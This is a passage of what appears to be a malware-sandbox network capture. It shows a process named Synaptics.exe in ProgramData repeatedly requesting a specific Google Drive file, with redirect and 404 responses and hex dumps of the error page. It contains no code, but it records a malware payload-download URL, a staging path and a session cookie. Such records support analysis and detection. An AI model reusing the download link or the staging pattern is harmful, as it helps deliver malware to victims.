                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:45 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-rliMRAuwcewcju2ActHR4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            54192.168.2.1649803142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:45 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-f3_6rFO4oaS0jhhK2UJM4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            55192.168.2.1649808142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:47 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:47 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GSspKMEed1hW17M9WZqHKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC4XgHu6N_GiFRwPhIVKWBfs5PjE30JK02AeTdz1IAlkDomta8iULcZDqVa9w8ELGkiKQyYWVgI9gQ
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:47 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:47 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 31 55 64 37 61 6e 30 30 5f 6b 4c 5f 4a 35 68 39 5f 4e 65 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="A1Ud7an00_kL_J5h9_NeUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:47 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            56192.168.2.1649807142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:47 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Hw2LVFRDP0Ya9T439uFHEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            57192.168.2.1649810142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:47 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NXd3sbqXoe44UrNCB4l_KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            58192.168.2.1649809142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:47 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:47 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Xq7dQqTe4udJyr3EShS-JA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2u6Q6KOEoywHhhCEoFTllfsxPPWjP88cfeHf-MumgkSUTi9Qkt3Z5B6hISWL-_l-o3zVBStXFY8Q
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:47 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:47 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 72 4f 65 4f 71 74 38 58 6b 47 76 36 6d 5f 44 54 58 5f 79 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="1rOeOqt8XkGv6m_DTX_yAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:47 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            59192.168.2.1649811142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:48 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kGx5_Mk2YWTxVuzEyZCSVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            60192.168.2.1649812142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:48 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-p2G329tdK2rVIClBXJeeXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            61192.168.2.1649813142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:48 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:48 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:48 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-0lLmqkjAYdD9a1wf_16kxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2gfXjWVDAsqeofbTuVqFphx1TFpghy6AWjWV0geGgt_sX12RDY2r7bJFc1qhebvbnuRIqjNYnTTA
                                                                                                            Server: UploadServer
